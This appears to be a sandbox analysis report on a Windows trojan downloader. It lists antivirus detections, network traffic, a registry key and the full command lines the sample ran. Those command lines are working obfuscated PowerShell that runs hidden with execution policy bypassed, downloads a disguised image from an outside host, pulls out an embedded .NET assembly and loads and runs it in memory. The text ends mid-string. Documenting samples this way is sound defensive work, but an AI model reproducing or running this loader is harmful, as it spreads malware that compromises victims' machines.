ZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/644/749/original/new_image.jpg?1698084523';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lm1iby8xNS4zMy4yNC4zOTEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))" |
cmdline | powershell -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoçNgBÇlkoç0BÇlkoçFMBÇlkoçdBÇlkoçByBÇlkoçGkBÇlkoçbgBnBÇlkoçCgBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZQBkBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçUgBlBÇlkoçGYBÇlkoçbBÇlkoçBlBÇlkoçGMBÇlkoçdBÇlkoçBpBÇlkoçG8BÇlkoçbgBÇlkoçuBÇlkoçEEBÇlkoçcwBzBÇlkoçGUBÇlkoçbQBiBÇlkoçGwBÇlkoçeQBdBÇlkoçDoBÇlkoçOgBMBÇlkoçG8BÇlkoçYQBkBÇlkoçCgBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçB0BÇlkoçHkBÇlkoçcBÇlkoçBlBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçbBÇlkoçBvBÇlkoçGEBÇlkoçZBÇlkoçBlBÇlkoçGQBÇlkoçQQBzBÇlkoçHMBÇlkoçZQBtBÇlkoçGIBÇlkoçbBÇlkoçB5BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçVBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçoBÇlkoçCcBÇlkoçRgBpBÇlkoçGIBÇlkoçZQByBÇlkoçC4BÇlkoçSBÇlkoçBvBÇlkoçG0BÇlkoçZQBÇlkoçnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçG0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçdBÇlkoçB5BÇlkoçHBÇlkoçBÇlkoçZQBÇlkoçuBÇlkoçEcBÇlkoçZQB0BÇlkoçE0BÇlkoçZQB0BÇlkoçGgBÇlkoçbwBkBÇlkoçCgBÇlkoçJwBWBÇlkoçEEBÇlkoçSQBÇlkoçnBÇlkoçCkBÇlkoçLgBJBÇlkoçG4BÇlkoçdgBvBÇlkoçGsBÇlkoçZQBÇlkoçoBÇlkoçCQBÇlkoçbgB1BÇlkoçGwBÇlkoçbBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçWwBvBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBbBÇlkoçF0BÇlkoçXQBÇlkoçgBÇlkoçCgBÇlkoçJwBkBÇlkoçEgBÇlkoçaBÇlkoçBÇlkoçwBÇlkoçEwBÇlkoçbQBÇlkoçxBÇlkoçGkBÇlkoçYgB5BÇlkoçDgBÇlkoçeBÇlkoçBOBÇlkoçFMBÇlkoçNBÇlkoçB6BÇlkoçE0BÇlkoçeQBÇlkoç0BÇlkoçHkBÇlkoçTgBDBÇlkoçDQBÇlkoçegBPBÇlkoçFQBÇlkoçRQB2BÇlkoçEwBÇlkoçegBwBÇlkoçHcBÇlkoçZBÇlkoçBIBÇlkoçFIBÇlkoçbwBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçZBÇlkoçBmBÇlkoçGQBÇlkoçZgBkBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGYBÇlkoçZBÇlkoçBmBÇlkoçCcBÇlkoçIBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJwBkBÇlkoçGEBÇlkoçZBÇlkoçBzBÇlkoçGEBÇlkoçJwBÇlkoçgBÇlkoçCwBÇlkoçIBÇlkoçBÇlkoçnBÇlkoçGQBÇlkoçZQBÇlkoçnBÇlkoçCBÇlkoçBÇlkoçLBÇlkoçBÇlkoçgBÇlkoçCcBÇlkoçYwB1BÇlkoçCcBÇlkoçKQBÇlkoçpBÇlkoçBÇlkoç==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('BÇlkoç','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
DrWeb | Trojan.DownLoader46.26678 |
Kaspersky | HEUR:Trojan.Script.Generic |
Data received | [ |
Data received | We;çÌæ$m´JÆÂçF×÷^òt DOWNGRD hÃs_ÏÏ¢ácIVÔòµ÷ZáÌÆ¿¡äÀ ÿ |
Data received | Q |
Data received | |
Data received | Aº¦û:d½VÕ1òóàä'õ¬èªYª×?ÒÆEnF²-zvq\¢6»ï %B¥&'A¼ F0D 2ØJFÏ|[ý7À|äé?ô>´Üý*¦ðI S&+©O>½¥tK0g£êZäW½Süºû¼ |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | FâýÃÏñó§q(ú& í-pfòËÚÉ)ÜС6ðweª^V |
Data sent | y ue;åWSGø´":Uά¨Zl½ ɨâ½êI¿ / 5 ÀÀÀ À 2 8 4ÿ uploaddeimagens.com.br |
Data sent | F BA.uÓ-T<DËZ[gú⤬[0dß$¦ÜѤ,áï¾åúÍq+æw²ª'w9Twþ 0,®¶;+[MzØ))ì.aÅÃÌzgⱩâ/J(»4JæÍ&§T |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVQByBÇlkoçGwBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBoBÇlkoçHQBÇlkoçdBÇlkoçBwBÇlkoçHMBÇlkoçOgBÇlkoçvBÇlkoçC8BÇlkoçdQBwBÇlkoçGwBÇlkoçbwBhBÇlkoçGQBÇlkoçZBÇlkoçBlBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBuBÇlkoçHMBÇlkoçLgBjBÇlkoçG8BÇlkoçbQBÇlkoçuBÇlkoçGIBÇlkoçcgBÇlkoçvBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBzBÇlkoçC8BÇlkoçMBÇlkoçBÇlkoçwBÇlkoçDQBÇlkoçLwBÇlkoç2BÇlkoçDQBÇlkoçNBÇlkoçBÇlkoçvBÇlkoçDcBÇlkoçNBÇlkoçBÇlkoç5BÇlkoçC8BÇlkoçbwByBÇlkoçGkBÇlkoçZwBpBÇlkoçG4BÇlkoçYQBsBÇlkoçC8BÇlkoçbgBlBÇlkoçHcBÇlkoçXwBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçLgBqBÇlkoçHBÇlkoçBÇlkoçZwBÇlkoç/BÇlkoçDEBÇlkoçNgBÇlkoç5BÇlkoçDgBÇlkoçMBÇlkoçBÇlkoç4BÇlkoçDQBÇlkoçNQBÇlkoçyBÇlkoçDMBÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçdwBlBÇlkoçGIBÇlkoçQwBsBÇlkoçGkBÇlkoçZQBuBÇlkoçHQBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçTgBlBÇlkoçHcBÇlkoçLQBPBÇlkoçGIBÇlkoçagBlBÇlkoçGMBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçTgBlBÇlkoçHQBÇlkoçLgBXBÇlkoçGUBÇlkoçYgBDBÇlkoçGwBÇlkoçaQBlBÇlkoçG4BÇlkoçdBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçHcBÇlkoçZQBiBÇlkoçEMBÇlkoçbBÇlkoçBpBÇlkoçGUBÇlkoçbgB0BÇlkoçC4BÇlkoçRBÇlkoçBvBÇlkoçHcBÇlkoçbgBsBÇlkoçG8BÇlkoçYQBkBÇlkoçEQBÇlkoçYQB0BÇlkoçGEBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBVBÇlkoçHIBÇlkoçbBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBpBÇlkoçG0BÇlkoçYQBnBÇlkoçGUBÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçVBÇlkoçBlBÇlkoçHgBÇlkoçdBÇlkoçBÇlkoçuBÇlkoçEUBÇlkoçbgBjBÇlkoçG8BÇlkoçZBÇlkoçBpBÇlkoçG4BÇlkoçZwBdBÇlkoçDoBÇlkoçOgBVBÇlkoçFQBÇlkoçRgBÇlkoç4BÇlkoçC4BÇlkoçRwBlBÇlkoçHQBÇlkoçUwB0BÇlkoçHIBÇlkoçaQBuBÇlkoçGcBÇlkoçKBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBCBÇlkoçHkBÇlkoçdBÇlkoçBlBÇlkoçHMBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBTBÇlkoçFQBÇlkoçQQBSBÇlkoçFQBÇlkoçPgBÇlkoç+BÇlkoçCcBÇlkoçOwBÇlkoçkBÇlkoçGUBÇlkoçbgBkBÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJwBÇlkoç8BÇlkoçDwBÇlkoçQgBBBÇlkoçFMBÇlkoçRQBÇlkoç2BÇlkoçDQBÇlkoçXwBFBÇlkoçE4BÇlkoçRBÇlkoçBÇlkoç+BÇlkoçD4BÇlkoçJwBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBÇlkoçkBÇlkoçGkBÇlkoçbQBhBÇlkoçGcBÇlkoçZQBUBÇlkoçGUBÇlkoçeBÇlkoçB0BÇlkoçC4BÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçE8BÇlkoçZgBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçKQBÇlkoç7BÇlkoçCQBÇlkoçZQBuBÇlkoçGQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçTwBmBÇlkoçCgBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBGBÇlkoçGwBÇlkoçYQBnBÇlkoçCkBÇlkoçOwBÇlkoçkBÇlkoçHMBÇlkoçdBÇlkoçBhBÇlkoçHIBÇlkoçdBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçZQBÇlkoçgBÇlkoçDBÇlkoçBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçGcBÇlkoçdBÇlkoçBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçgBÇlkoçCsBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEYBÇlkoçbBÇlkoçBhBÇlkoçGcBÇlkoçLgBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoç7BÇlkoçCQBÇlkoçYgBhBÇlkoçHMBÇlkoçZQBÇlkoç2BÇlkoçDQBÇlkoçTBÇlkoçBlBÇlkoçG4BÇlkoçZwB0BÇlkoçGgBÇlkoçIBÇlkoçBÇlkoç9BÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBlBÇlkoçG4BÇlkoçZBÇlkoçBJBÇlkoçG4BÇlkoçZBÇlkoçBlBÇlkoçHgBÇlkoçIBÇlkoçBÇlkoçtBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBzBÇlkoçHQBÇlkoçYQByBÇlkoçHQBÇlkoçSQBuBÇlkoçGQBÇlkoçZQB4BÇlkoçDsBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBDBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçCBÇlkoçBÇlkoçPQBÇlkoçgBÇlkoçCQBÇlkoçaQBtBÇlkoçGEBÇlkoçZwBlBÇlkoçFQBÇlkoçZQB4BÇlkoçHQBÇlkoçLgBTBÇlkoçHUBÇlkoçYgBzBÇlkoçHQBÇlkoçcgBpBÇlkoçG4BÇlkoçZwBÇlkoçoBÇlkoçCQBÇlkoçcwB0BÇlkoçGEBÇlkoçcgB0BÇlkoçEkBÇlkoçbgBkBÇlkoçGUBÇlkoçeBÇlkoçBÇlkoçsBÇlkoçCBÇlkoçBÇlkoçJBÇlkoçBiBÇlkoçGEBÇlkoçcwBlBÇlkoçDYBÇlkoçNBÇlkoçBMBÇlkoçGUBÇlkoçbgBnBÇlkoçHQBÇlkoçaBÇlkoçBÇlkoçpBÇlkoçDsBÇlkoçJBÇlkoçBjBÇlkoçG8BÇlkoçbQBtBÇlkoçGEBÇlkoçbgBkBÇlkoçEIBÇlkoçeQB0BÇlkoçGUBÇlkoçcwBÇlkoçgBÇlkoçD0BÇlkoçIBÇlkoçBbBÇlkoçFMBÇlkoçeQBzBÇlkoçHQBÇlkoçZQBtBÇlkoçC4BÇlkoçQwBvBÇlkoçG4BÇlkoçdgBlBÇlkoçHIBÇlkoçdBÇlkoçBdBÇlkoçDoBÇlkoçOgBGBÇlkoçHIBÇlkoçbwBtBÇlkoçEIBÇlkoçYQBzBÇlkoçGUBÇlkoç